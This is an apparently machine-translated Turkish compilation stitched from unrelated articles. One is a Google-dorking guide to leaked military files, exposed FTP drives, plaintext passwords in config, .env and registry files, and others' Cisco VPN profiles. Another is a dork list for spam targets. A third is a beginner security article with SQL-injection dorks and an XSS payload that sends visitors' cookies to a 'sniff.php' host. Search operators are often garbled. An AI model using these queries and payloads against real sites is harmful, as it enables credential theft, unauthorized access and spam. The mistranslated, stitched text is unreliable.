    Genç bir bilgisayar korsanının gizli bilgileri çalarak Pentagon veya NASA'nın "sunucularına girdiği" haberini okuduğunuzda, çoğu durumda bu, Google'ı kullanmanın tam da bu temel tekniğidir. NASA çalışanlarının bir listesi ve iletişim bilgileriyle ilgilendiğimizi varsayalım. Elbette böyle bir liste elektronik biçimdedir. Kolaylık sağlamak için veya bir gözetim nedeniyle, kuruluşun web sitesinde de yer alabilir. Dahili kullanım için tasarlandığından, bu durumda ona hiçbir referans olmayacağı mantıklıdır. Böyle bir dosyada hangi kelimeler olabilir? En azından - "adres" alanı. Tüm bu varsayımları test etmek kolaydır.


    inurl:nasa.gov dosya türü:xlsx "adres"


    Bürokrasi kullanıyoruz

    Bu tür buluntular hoş bir önemsememek. Gerçekten sağlam olan nokta, Google Web Yöneticisi Operatörleri, Web'in kendisi ve aradığınız şeyin yapısı hakkında daha ayrıntılı bilgi sahibi olmaktan gelir. Ayrıntıları bilerek, geri kalanında gerçekten değerli veriler elde etmek için çıktıyı kolayca filtreleyebilir ve ihtiyacınız olan dosyaların özelliklerini iyileştirebilirsiniz. Bürokrasinin burada kurtarmaya gelmesi komik. Yanlışlıkla Web'e sızan gizli bilgileri aramayı kolaylaştıran tipik formülasyonlar üretir.

    Örneğin, ABD Savunma Bakanlığı ofisinde zorunlu olan Dağıtım beyanı damgası, bir belgenin dağıtımına ilişkin standartlaştırılmış kısıtlamalar anlamına gelir. A harfi, gizli hiçbir şeyin olmadığı halka açık yayınları işaret eder; B - yalnızca dahili kullanım için tasarlanmıştır, C - kesinlikle gizlidir ve F'ye kadar böyle devam eder. Ayrı olarak, en yüksek düzeyde bir devlet sırrını temsil eden özellikle değerli bilgileri işaretleyen X harfi vardır. Görev başında yapması gerekenler bu tür belgeleri arasın, biz de kendimizi C harfli dosyalarla sınırlayacağız. DoDI 5230.24'e göre bu tür bir işaretleme, ihracat kontrolüne giren kritik teknolojilerin açıklamasını içeren belgelere atanır. Bu tür özenle korunan bilgileri ABD Ordusuna tahsis edilmiş .mil üst düzey alan adındaki sitelerde bulabilirsiniz.

    "DAĞITIM BEYANI C" inurl:navy.mil

    .mil domaininde sadece ABD Savunma Bakanlığı ve sözleşmeli kuruluşlarına ait sitelerin toplanması çok uygundur. Etki alanıyla sınırlı arama sonuçları son derece temizdir ve başlıklar kendileri için konuşur. Rus sırlarını bu şekilde aramak pratikte işe yaramaz: .ru ve .rf alanlarında kaos hüküm sürüyor ve birçok silah sisteminin adı kulağa botanik (PP "Kiparis", kundağı motorlu silahlar "Acacia") ve hatta muhteşem (TOS "Pinokyo") gibi geliyor.


    .mil etki alanındaki bir sitedeki herhangi bir belgeyi dikkatlice inceleyerek, aramanızı daraltmak için diğer işaretçileri görebilirsiniz. Örneğin, ilginç teknik bilgileri aramak için de uygun olan "Sec 2751" ihracat kısıtlamalarına bir referans. Zaman zaman, bir zamanlar göründüğü resmi sitelerden kaldırılır, bu nedenle, arama sonuçlarında ilginç bir bağlantıyı takip edemiyorsanız, Google önbellek (önbellek operatörü) veya İnternet Arşivi web sitesini kullanın.

    bulutlara tırmanıyoruz

    Devlet dairelerinden yanlışlıkla gizliliği kaldırılan belgelere ek olarak, Google önbelleğinde ara sıra, herkese açık olarak yayınlanan verilere "özel" bağlantılar oluşturan Dropbox ve diğer veri depolama hizmetlerinden kişisel dosyalara bağlantılar açılır. Alternatif ve kendi kendine yapılan hizmetlerle daha da kötü. Örneğin, aşağıdaki sorgu, yüklü bir FTP sunucusuna sahip olan ve yönlendiricilerinde aktif olarak bir yönlendirici kullanan tüm Verizon istemcilerinin verilerini bulur.

    Allinurl:ftp://verizon.net

    Şu anda kırk binden fazla akıllı insan var ve 2015 baharında çok daha fazlası vardı. Verizon.net yerine, herhangi bir tanınmış sağlayıcının adını değiştirebilirsiniz ve ne kadar ünlü olursa, yakalama o kadar büyük olabilir. Yerleşik FTP sunucusu aracılığıyla, yönlendiriciye bağlı harici bir sürücüdeki dosyaları görebilirsiniz. Genellikle bu, uzaktan çalışma, kişisel bir bulut veya bir tür eşler arası dosya indirme için bir NAS'dır. Bu tür ortamların tüm içeriği Google ve diğer arama motorları tarafından dizine eklenir, böylece harici sürücülerde depolanan dosyalara doğrudan bir bağlantı aracılığıyla erişebilirsiniz.

    gözetleme yapılandırmaları

    Buluta toptan geçişten önce, güvenlik açıkları da olmayan basit FTP sunucuları, uzak depolar olarak hüküm sürüyordu. Birçoğu bugün hala alakalı. Örneğin, popüler WS_FTP Professional programı, ws_ftp.ini dosyasında yapılandırma verilerini, kullanıcı hesaplarını ve parolaları depolar. Bulmak ve okumak kolaydır, çünkü tüm girişler düz metin olarak saklanır ve şifreler minimum düzeyde şaşırtmadan sonra Üçlü DES algoritması kullanılarak şifrelenir. Çoğu sürümde, yalnızca ilk baytın atılması yeterlidir.

    WS_FTP Password Decryptor yardımcı programını veya ücretsiz bir web hizmetini kullanarak bu tür parolaların şifresini çözmek kolaydır.

    Rastgele bir siteyi hacklemekten bahsederken, genellikle CMS veya e-ticaret uygulama yapılandırma dosyalarının günlüklerinden ve yedeklerinden bir şifre almayı kastederler. Tipik yapılarını biliyorsanız, anahtar kelimeleri kolayca belirtebilirsiniz. ws_ftp.ini'de bulunanlara benzer satırlar son derece yaygındır. Örneğin, Drupal ve PrestaShop her zaman bir kullanıcı kimliğine (UID) ve karşılık gelen bir parolaya (pwd) sahiptir ve tüm bilgiler .inc uzantılı dosyalarda saklanır. Bunları şu şekilde arayabilirsiniz:

    "pwd=" "UID=" dahili:inc

    DBMS'den şifreleri açıklıyoruz

    SQL sunucularının yapılandırma dosyalarında, kullanıcı adları ve e-posta adresleri düz metin olarak saklanır ve parolalar yerine MD5 hash'leri kaydedilir. Kesin konuşmak gerekirse bunların şifresini çözmek imkansızdır, ancak bilinen hash-parola çiftleri arasında bir eşleşme bulabilirsiniz.

    Şimdiye kadar, parola karması bile kullanmayan DBMS'ler var. Herhangi birinin yapılandırma dosyaları tarayıcıda kolayca görüntülenebilir.

    Metin:DB_PASSWORD dosya türü:env

    Windows sunucularının gelişiyle, yapılandırma dosyalarının yeri kısmen kayıt defteri tarafından alındı. Dosya türü olarak reg'i kullanarak dalları arasında tamamen aynı şekilde arama yapabilirsiniz. Örneğin, bunun gibi:

    Filetype:reg HKEY_CURRENT_USER "Şifre"=

    Açık olanı unutma

    Bazen Google tarafından yanlışlıkla açılan ve yakalanan veriler yardımıyla gizli bilgilere ulaşmak mümkündür. İdeal seçenek, bazı yaygın biçimlerde bir parola listesi bulmaktır. Hesap bilgilerini bir metin dosyasında, bir Word belgesinde veya bir Excel elektronik tablosunda yalnızca çaresiz insanlar saklayabilir, ancak bunlardan her zaman yeterince vardır.

    Dosya türü:xls inurl:şifre

    Bir yandan, bu tür olayları önlemenin birçok yolu vardır. htaccess, patch CMS'de yeterli erişim haklarının belirtilmesi, sol betiklerin kullanılmaması ve diğer deliklerin kapatılması gerekmektedir. Ayrıca, arama motorlarının içinde belirtilen dosya ve dizinleri dizine eklemesini yasaklayan robots.txt dışlama listesine sahip bir dosya da vardır. Öte yandan, bazı sunuculardaki robots.txt yapısı standart olandan farklıysa, üzerinde neyi saklamaya çalıştıkları hemen anlaşılır.

    Herhangi bir sitedeki dizinlerin ve dosyaların listesinden önce standart yazıt dizini gelir. Hizmet amacıyla başlıkta görünmesi gerektiğinden, aramasını intitle operatörüyle sınırlamak mantıklıdır. /admin/, /personal/, /etc/ ve hatta /secret/ dizinlerinde ilginç şeyler bulunabilir.

    güncellemeleri takip et

    Alaka düzeyi burada son derece önemlidir: eski güvenlik açıkları çok yavaş kapatılır, ancak Google ve arama sonuçları sürekli değişir. "Son saniye" filtresi (istek url'sinin sonunda &tbs=qdr:s) ile "gerçek zamanlı" filtresi (&tbs=qdr:1) arasında bile fark vardır.

    Google'dan son dosya güncelleme tarihinin zaman aralığı da dolaylı olarak belirtilir. Grafik web arayüzü aracılığıyla, tipik dönemlerden birini (saat, gün, hafta vb.) seçebilir veya bir tarih aralığı belirleyebilirsiniz, ancak bu yöntem otomasyon için uygun değildir.

    Adres çubuğunun görünümünden, yalnızca &tbs=qdr: yapısını kullanarak sonuçların çıktısını sınırlamanın bir yolu hakkında tahminde bulunulabilir. Ondan sonraki y harfi bir yılın sınırını belirtir (&tbs=qdr:y), m geçen ay, w hafta, d son gün, h son saat, n dakika ve s saniye sonuçlarını gösterir. Google'ın yeni öğrendiği en son sonuçlar, &tbs=qdr:1 filtresi kullanılarak bulunur.

    Zor bir komut dosyası yazmanız gerekiyorsa, tarih aralığının Google'da tarih aralığı operatörü aracılığıyla Jülyen biçiminde ayarlandığını bilmek yararlı olacaktır. Örneğin, 1 Ocak ile 1 Temmuz 2015 arasında yüklenen ve içinde gizli kelimesi bulunan PDF belgelerinin listesini bu şekilde bulabilirsiniz.

    Gizli dosya türü:pdf tarih aralığı:2457024-2457205

    Aralık, Jülyen tarih biçiminde ondalık basamaklar olmadan belirtilir. Bunları Miladi takvimden manuel olarak çevirmek sakıncalıdır. Bir tarih dönüştürücü kullanmak daha kolaydır.

    Yeniden hedefleme ve filtreleme

    Arama sorgusunda ek operatörler belirtmenin yanı sıra, doğrudan bağlantı gövdesinde gönderilebilirler. Örneğin, filetype:pdf özelliği, as_filetype=pdf yapısına karşılık gelir. Bu nedenle, herhangi bir açıklama ayarlamak uygundur. Arama URL'sine cr=countryHN yapısı eklenerek yalnızca Honduras Cumhuriyeti'nden elde edilen sonuçların çıktısının ayarlandığını, ancak yalnızca Bobruisk şehrinden - gcs=Bobruisk olduğunu varsayalım. tam listesi için geliştirici bölümüne bakın.

    Google'ın otomasyon araçları, hayatı kolaylaştırmak için tasarlanmıştır, ancak genellikle güçlükleri artırır. Örneğin, bir kullanıcının şehri, WHOIS aracılığıyla kullanıcının IP'si tarafından belirlenir. Google, bu bilgilere dayanarak yalnızca sunucular arasındaki yükü dengelemekle kalmaz, aynı zamanda arama sonuçlarını da değiştirir. Bölgeye bağlı olarak, aynı sorgu için ilk sayfaya farklı sonuçlar gelir ve bazıları tamamen gizlenebilir. Kendinizi bir kozmopolit gibi hissedin ve herhangi bir ülkeden bilgi aramak, gl=country direktifinden sonraki iki harfli koduna yardımcı olacaktır. Örneğin, Hollanda'nın kodu NL iken, Vatikan ve Kuzey Kore'nin Google'da kendi kodları yoktur.

    Çoğu zaman, birkaç gelişmiş filtre kullandıktan sonra bile arama sonuçları dağınıktır. Bu durumda, sorguya birkaç istisna sözcük ekleyerek (her birinin önünde bir eksi işareti vardır) sorguyu hassaslaştırmak kolaydır. Örneğin, bankacılık , adlar ve öğretici genellikle Kişisel sözcüğüyle birlikte kullanılır. Bu nedenle, daha temiz arama sonuçları, bir sorgunun ders kitabı örneğini değil, rafine edilmiş bir örneğini gösterecektir:

    Intitle:"/Kişisel/ Dizini" -isimler -öğretici -bankacılık

    Son Örnek

    Sofistike bir bilgisayar korsanı, ihtiyaç duyduğu her şeyi kendi başına sağlamasıyla ayırt edilir. Örneğin, bir VPN uygun bir şeydir, ancak ya pahalıdır ya da geçicidir ve kısıtlamaları vardır. Tek başınıza kaydolmak çok pahalıdır. Grup aboneliklerinin olması iyi bir şey ve Google'ın yardımıyla bir grubun parçası olmak çok kolay. Bunu yapmak için, oldukça standart olmayan bir PCF uzantısına ve tanınabilir bir yola sahip Cisco VPN yapılandırma dosyasını bulmanız yeterlidir: Program Files\Cisco Systems\VPN Client\Profiles . Bir istek ve örneğin, Bonn Üniversitesi'nin güler yüzlü personeline katılın.

    Dosya tipi: pcf vpn VEYA Grup

    BİLGİ Google, şifreli yapılandırma dosyaları bulur, ancak bunların çoğu şifrelenmiştir veya karma dosyalarıyla değiştirilmiştir. Sabit uzunlukta dizeler görürseniz, hemen bir şifre çözme hizmeti arayın.

    Parolalar şifreli biçimde saklanır, ancak Maurice Massard zaten şifrelerini çözmek için bir program yazdı ve bunu thecampusgeeks.com aracılığıyla ücretsiz olarak sağlıyor.

    Google yardımıyla yüzlerce farklı türde saldırı ve penetrasyon testi yapılmaktadır. Popüler programları, ana veritabanı biçimlerini, çok sayıda PHP güvenlik açığını, bulutları vb. etkileyen birçok seçenek vardır. Tam olarak ne aradığınızı bilmek, ihtiyaç duyduğunuz bilgileri (özellikle de halka açık hale getirmeyi düşünmediğiniz bilgileri) almayı çok daha kolaylaştırır. Sadece Shodan ilginç fikirleri değil, indekslenmiş ağ kaynaklarının herhangi bir veri tabanını da besliyor!

    google.com'u kullanarak nasıl arama yapılır?

    Muhtemelen herkes Google gibi bir arama motorunun nasıl kullanılacağını biliyordur =) Ancak, özel yapıları kullanarak doğru bir arama sorgusu oluşturursanız, aradığınız sonuca çok daha verimli ve hızlı bir şekilde ulaşabileceğinizi herkes bilmez =) Bu makalede, doğru arama yapmak için neleri ve nasıl yapmanız gerektiğini göstermeye çalışacağım.

    Google, google.com'da arama yaparken özel anlam taşıyan birkaç gelişmiş arama operatörünü destekler. Tipik olarak, bu operatörler aramayı değiştirir ve hatta Google'a tamamen farklı arama türleri yapmasını söyler. Örneğin, link: build özel bir işleçtir ve sorgu bağlantı: www.google.com size normal bir arama yapmayacak, bunun yerine google.com'a bağlantıları olan tüm web sayfalarını bulacaktır.
    alternatif istek türleri

    önbellek: Sorguya başka kelimeler eklerseniz, Google önbelleğe alınan belgede bulunan kelimeleri vurgulayacaktır.
    Örneğin, önbellek: www.web sitesi"web" kelimesi vurgulanmış olarak önbelleğe alınmış içeriği gösterecektir.

    link: Yukarıdaki arama sorgusu, belirtilen sorguya bağlantılar içeren web sayfalarını gösterecektir.
    Örneğin: bağlantı: www.web sitesi http://www.site bağlantısı olan tüm sayfaları görüntüler.

    ilgili: Belirtilen web sayfasıyla "ilgili" web sayfalarını görüntüler.
    Örneğin, ilgili: www.google.com Google ana sayfasına benzer web sayfalarını listeler.

    info: Bilgi İste: istenen web sayfası hakkında Google'ın sahip olduğu bazı bilgileri sağlayacaktır.
    Örneğin, bilgi:web sitesi forumumuz hakkında bilgi gösterecek =) (Armada - Yetişkin web yöneticilerinin forumu).

    Diğer bilgi talepleri

    define: define: sorgusu, bundan sonra yazdığınız kelimelerin çeşitli çevrimiçi kaynaklardan derlenmiş bir tanımını sağlayacaktır. Tanım, girilen ifadenin tamamı için olacaktır (yani, tam sorgudaki tüm kelimeleri içerecektir).

    hisse senetleri: Hisse senetleri ile bir sorgu başlatırsanız: Google, sorgu terimlerinin geri kalanını hisse senetleri olarak kabul eder ve bu karakterler için hazırlanmış bilgileri gösteren bir sayfaya bağlantı verir.
    Örneğin, hisse senetleri: intel yahoo Intel ve Yahoo hakkında bilgi gösterecektir. (Şirket adını değil, son dakika haber karakterlerini yazdırmanız gerektiğini unutmayın)

    İstek Değiştiriciler

    site: Sorgunuza site: eklerseniz, Google sonuçları o alanda bulduğu web siteleriyle sınırlandırır.
    Ayrıca ru, org, com, vb. gibi ayrı bölgeleri de arayabilirsiniz ( site: com site:ru)

    allintitle: allintitle: ile bir sorgu çalıştırırsanız, Google sonuçları başlıktaki tüm sorgu sözcükleriyle sınırlandırır.
    Örneğin, allintitle: google arama resimler, Blog vb. gibi tüm Google arama sayfalarını döndürür

    intitle: Sorgunuza intitle: eklerseniz, Google, sonuçları başlıkta o kelimeyi içeren belgelerle kısıtlar.
    Örneğin, başlık:iş

    allinurl: allinurl ile bir sorgu çalıştırırsanız: Google, sonuçları URL'deki tüm sorgu sözcükleriyle sınırlayacaktır.
    Örneğin, allinurl: google arama google ile belgeleri döndürür ve başlıkta arama yapar. Ayrıca, bir seçenek olarak, kelimeleri eğik çizgi (/) ile ayırabilirsiniz, ardından eğik çizginin her iki tarafındaki kelimeler aynı sayfada aranacaktır: Örnek allinurl: foo/bar

    inurl: Sorgunuza inurl: eklerseniz, Google sonuçları URL'de o kelimeyi içeren belgelerle kısıtlar.
    Örneğin, Animasyon girişi:web sitesi

    intext: belirtilen kelimeyi yalnızca sayfanın metninde arar, bağlantıların başlığını ve metinlerini ve ilgili olmayan diğer şeyleri göz ardı eder.Bu değiştiricinin bir türevi de vardır - allintext: yani. ayrıca, sorgudaki tüm kelimeler yalnızca metin içinde aranacaktır, bu da önemlidir, bağlantılarda sık kullanılan kelimeler göz ardı edilir.
    Örneğin, metin:forum

    tarih aralığı: zaman dilimlerinde arama yapar (tarih aralığı:2452389-2452389), saatlerin tarihleri ​​Jülyen biçiminde belirtilir.

    Pekala, ve her türlü ilginç istek örneği

    Google için sorgu derleme örnekleri. Spam gönderenler için

    inurl:control.guest?a=işaret

    Site:books.dreambook.com "Ana Sayfa URL'si" "İmzala" inurl:sign

    Site:www.freegb.net Ana Sayfa

    Inurl:sign.asp "Karakter Sayısı"

    "Mesaj:" inurl:sign.cfm "Gönderen:"

    inurl:register.php "Kullanıcı Kaydı" "Web Sitesi"

    Inurl:edu/guestbook “Ziyaretçi Defterini İmzalayın”

    Inurl:post "Yorum Gönder" "URL"

    Inurl:/archives/ "Yorumlar:" "Bilgiyi hatırladın mı?"

    “Komut Dosyası ve Ziyaretçi Defteri Oluşturan:” “URL:” “Yorumlar:”

    inurl:?action=“phpBook” “URL” ekleyin

    Intitle:"Yeni Hikaye Gönder"

    Dergiler

    inurl:www.livejournal.com/users/mode=reply

    inurl greatjournal.com/mode=yanıtla

    Inurl:fastbb.ru/re.pl?

    Inurl:fastbb.ru /re.pl? "Ziyaretçi defteri"

    Bloglar

    Inurl:blogger.com/comment.g?”postID”"anonim"

    Inurl:typepad.com/ “Yorum gönder” “Kişisel bilgileri hatırlıyor musun?”

    Inurl:greatestjournal.com/community/ "Yorum gönder" "anonim gönderenlerin adresleri"

    “Yorum gönder” “isimsiz gönderenlerin adresleri” -

    Intitle:"Yorum gönder"

    Inurl:pirillo.com "Yorum gönder"

    Forumlar

    Inurl:gate.html?”name=Forumlar” “mode=yanıt”

    inurl:”forum/posting.php?mode=yanıtla”

    inurl:”mes.php?”

    inurl:”members.html”

    inurl:forum/memberlist.php?”

    Biraz bilgi güvenliğinden bahsetmeye karar verdim. Makale acemi programcılar ve Frontend geliştirmeye yeni başlayanlar için faydalı olacaktır. Sorun nedir?

    Birçok acemi geliştirici, kod yazmaya o kadar bağımlıdır ki, işlerinin güvenliğini tamamen unuturlar. Ve en önemlisi, SQL sorgusu, XXS gibi güvenlik açıklarını unutuyorlar. Ayrıca yönetim panelleri için kolay şifreler buluyorlar ve kaba kuvvete maruz kalıyorlar. Bu saldırılar nelerdir ve nasıl önlenebilir?

    SQL enjeksiyonu

    SQL enjeksiyonu, belirli bir DBMS için bir SQL sorgusu ile gerçekleştirilen en yaygın veritabanı saldırısı türüdür. Birçok kişi ve hatta büyük şirketler bu tür saldırılardan muzdariptir. Bunun nedeni, bir geliştiricinin bir veritabanı ve aslında SQL sorguları yazarken yaptığı hatadır.

    SQL sorgularında kullanılan giriş verilerinin yanlış işlenmesi nedeniyle bir SQL enjeksiyon tipi saldırı mümkündür. Bir bilgisayar korsanının başarılı bir saldırısıyla, yalnızca veritabanlarının içeriğini değil, aynı zamanda yönetim panelinin sırasıyla şifrelerini ve günlüklerini de kaybetme riskiyle karşı karşıya kalırsınız. Ve bu veriler, siteyi tamamen ele geçirmek veya üzerinde geri dönüşü olmayan ayarlamalar yapmak için oldukça yeterli olacaktır.

    Saldırı, PHP, ASP, Perl ve diğer dillerde yazılmış betiklerde başarıyla yeniden üretilebilir. Bu tür saldırıların başarısı daha çok hangi DBMS'nin kullanıldığına ve senaryonun kendisinin nasıl uygulandığına bağlıdır. Dünyada SQL enjeksiyonları için savunmasız birçok site var. Bunu doğrulamak kolaydır. "Dorks" girmek yeterlidir - bunlar, savunmasız siteleri bulmak için özel isteklerdir. Bunlardan bazıları:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Nasıl kullanılır? Bunları Google veya Yandex arama motoruna girmeniz yeterlidir. Arama motoru size yalnızca savunmasız bir site değil, aynı zamanda bu güvenlik açığı için bir sayfa da verecektir. Ancak burada durup sayfanın gerçekten savunmasız olduğundan emin olmayacağız. Bunun için “id=1” değerinden sonra tek tırnak “‘” koymak yeterlidir. Bunun gibi bir şey:

    • inurl:games.php?id=1'

    Ve site bize SQL sorgusu hakkında bir hata verecektir. Bilgisayar korsanımızın bundan sonra neye ihtiyacı var?

    Ve sonra, sayfanın bu bağlantısına bir hata ile ihtiyacı var. Daha sonra çoğu durumda güvenlik açığı üzerinde çalışma, bu kısım için yardımcı programlarıyla birlikte "Kali linux" dağıtımında gerçekleştirilir: enjeksiyon kodunun tanıtılması ve gerekli işlemlerin gerçekleştirilmesi. Bu nasıl olacak, sana söyleyemem. Ancak bununla ilgili bilgileri internette bulabilirsiniz.

    XSS Saldırısı

    Bu saldırı türü çerezler üzerinde gerçekleştirilir. Buna karşılık, kullanıcıları kurtarmaya çok düşkünler. Neden? Onlarsız nasıl? Sonuçta, Çerezler sayesinde, Vk.com veya Mail.ru'dan yüzlerce kez şifre girmiyoruz. Ve onları reddeden çok az kişi var. Ancak internette, bilgisayar korsanları için genellikle bir kural vardır: uygunluk katsayısı, güvensizlik katsayısı ile doğru orantılıdır.

    Bir XSS saldırısı uygulamak için bilgisayar korsanımızın JavaScript bilgisine ihtiyacı vardır. Dil ilk bakışta çok basit ve zararsızdır çünkü bilgisayar kaynaklarına erişimi yoktur. Bir bilgisayar korsanı, yalnızca bir tarayıcıda JavaScript ile çalışabilir, ancak bu kadarı yeterlidir. Sonuçta, asıl şey kodu web sayfasına girmektir.

    Saldırı süreci hakkında ayrıntılara girmeyeceğim. Bunun nasıl olduğunun sadece temellerini ve anlamını anlatacağım.

    Bir bilgisayar korsanı, bazı forumlara veya ziyaretçi defterine JS kodu ekleyebilir:

    Document.location.href="http://192.168.1.7/sniff.php?test"

    Komut dosyaları bizi, kodun yürütüleceği virüslü bir sayfaya yönlendirir: ister bir algılayıcı, ister bir tür depolama veya bir şekilde Çerezlerimizi önbellekten çalacak bir istismar.

    Neden JavaScript? Çünkü JavaScript, web istekleri konusunda harikadır ve tanımlama bilgilerine erişimi vardır. Ancak betiğimiz bizi bir siteye aktarırsa, kullanıcı bunu kolayca fark edecektir. Burada bilgisayar korsanı daha kurnaz bir seçenek kullanır - sadece kodu resme girer.

    Img=newImage();

    Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

    Basitçe bir görüntü oluşturuyoruz ve betiğimizi ona bir adres olarak atadık.

    Kendinizi tüm bunlardan nasıl korursunuz? Çok basit - şüpheli bağlantıları takip etmeyin.

    DoS ve DDos Saldırıları

    DoS (İngilizce Hizmet Reddi'nden - hizmet reddi, bir bilgisayar sistemini başarısızlığa uğratmak amacıyla yapılan bir bilgisayar korsanı saldırısıdır. Bu, sistemin vicdani kullanıcılarının sağlanan sistem kaynaklarına (sunuculara) erişemeyeceği veya bu erişimin zor olduğu koşulların yaratılmasıdır. Sistemin arızalanması, acil bir durumda yazılım herhangi bir kritik bilgi verirse, sistemin ele geçirilmesine yönelik bir adım olabilir: örneğin, sürüm, program kodunun bir kısmı, vb. Ancak çoğu zaman bu, ekonomik baskının bir ölçüsüdür: gelir getiren basit bir hizmetin kaybı. Sağlayıcıdan gelen faturalar veya saldırıyı önlemek için alınan önlemler cepteki "hedefi" önemli ölçüde vurdu. Şu anda DoS ve DDoS saldırıları, yasal olarak önemli kanıtlar bırakmadan hemen hemen her sistemi başarısızlığa uğratmanıza izin verdiği için en popüler olanlardır.

    DoS ve DDos saldırıları arasındaki fark nedir?

    DoS, akıllı bir şekilde oluşturulmuş bir saldırıdır. Örneğin, sunucu gelen paketlerin doğruluğunu kontrol etmezse, bilgisayar korsanı sonsuza kadar işlenecek böyle bir talepte bulunabilir ve diğer bağlantılarla çalışmak için yeterli işlemci süresi olmayacaktır. Buna göre, müşteriler bir hizmet reddi alacaklardır. Ancak, iyi bilinen büyük siteleri bu şekilde aşırı yüklemek veya devre dışı bırakmak işe yaramayacaktır. Oldukça geniş kanallara ve bu tür bir aşırı yük ile kolayca başa çıkabilecek süper güçlü sunuculara sahipler.

    DDoS aslında DoS ile aynı saldırıdır. Ancak DoS'ta bir istek paketi varsa, o zaman DDoS'ta yüzlerce veya daha fazlası olabilir. Ağır hizmet sunucuları bile bu tür bir aşırı yük ile baş edemeyebilir. Sana bir örnek vereceğim.

    Bir DoS saldırısı, birisiyle sohbet ederken, sonra kötü huylu bir kişinin gelip yüksek sesle bağırmaya başlamasıdır. Konuşmak ya imkansızdır ya da çok zordur. Çözüm: Kişiyi sakinleştirecek ve odadan çıkaracak olan güvenliği arayın. DDoS saldırıları, bu tür binlerce kötü niyetli insanın içeri girdiği zamandır. Bu durumda, gardiyanlar bükülüp herkesi alamayacak.

    DoS ve DDoS, zombi denilen bilgisayarlardan üretilir. Bunlar, makinelerinin herhangi bir sunucunun saldırısına karıştığından şüphelenmeyen bilgisayar korsanları tarafından saldırıya uğrayan kullanıcıların bilgisayarlarıdır.

    Kendinizi bundan nasıl korursunuz? Genel olarak, hiçbir şekilde. Ancak bir bilgisayar korsanının görevini karmaşıklaştırabilirsiniz. Bunu yapmak için, güçlü sunuculara sahip iyi bir barındırma seçmeniz gerekir.

    kaba kuvvet saldırısı

    Bir geliştirici çok sayıda saldırı koruma sistemi bulabilir, yazdığımız komut dosyalarını tamamen gözden geçirebilir, sitede güvenlik açıkları olup olmadığını kontrol edebilir vb. Ancak site düzeninin son aşamasına gelince, yani sadece yönetici paneline bir şifre koyacağı zaman, bir şeyi unutabiliyor. Şifre!

    Basit bir parola belirlemeniz kesinlikle önerilmez. 12345, 1114457, vasya111 vb. olabilir. 10-11 karakterden daha kısa şifreler belirlemeniz önerilmez. Aksi takdirde, en yaygın ve karmaşık olmayan saldırıya maruz kalabilirsiniz - Brute Force.

    Brute force, özel programlar kullanan sözlük tabanlı bir parola kaba kuvvet saldırısıdır. Sözlükler farklı olabilir: Latince, sayılara göre sıralama, diyelim ki belli bir aralığa kadar, karışık (Latince + sayılar) ve hatta benzersiz sembollere sahip sözlükler bile var @#4$%&*~~`'”\ ? vesaire.

    Elbette bu tür saldırılardan kaçınmak kolaydır, karmaşık bir parola bulmak yeterlidir. Captcha bile sizi kurtarabilir. Ayrıca, siteniz CMS'de yapılmışsa, birçoğu benzer bir saldırı türü hesaplar ve ip'yi engeller. Parolada ne kadar farklı karakter varsa, onu almanın o kadar zor olduğunu her zaman hatırlamalıyız.

    Bilgisayar korsanları nasıl çalışır? Çoğu durumda, ya şüphelenirler ya da şifrenin bir kısmını zaten bilirler. Kullanıcı şifresinin kesinlikle 3 veya 5 karakterden oluşmayacağını varsaymak oldukça mantıklıdır. Bu tür şifreler sık ​​sık bilgisayar korsanlığına yol açar. Temel olarak, bilgisayar korsanları 5 ila 10 karakter aralığını alır ve oraya muhtemelen önceden bildikleri birkaç karakter ekler. Ardından, istenen aralıklarda parolalar oluşturun. Kali linux dağıtımının bile bu tür durumlar için programları vardır. Ve işte, sözlüğün hacmi artık o kadar büyük olmadığı için saldırı artık uzun sürmeyecek. Ek olarak, bir bilgisayar korsanı video kartının gücünü kullanabilir. Bazıları CUDA sistemini desteklerken numaralandırma hızı 10 kata kadar artar. Ve şimdi bu kadar basit bir saldırının oldukça gerçek olduğunu görüyoruz. Ancak yalnızca siteler kaba kuvvete maruz kalmaz.

    Sevgili geliştiriciler, bilgi güvenliği sistemini asla unutmayın, çünkü günümüzde devletler dahil birçok insan bu tür saldırılardan muzdariptir. Ne de olsa, en büyük güvenlik açığı, her zaman bir yerde dikkati dağılabilen veya bir yeri gözden kaçırabilen bir kişidir. Biz programcıyız ama programlanmış makine değiliz. Her zaman tetikte olun, çünkü bilgi kaybı ciddi sonuçlar doğurabilir!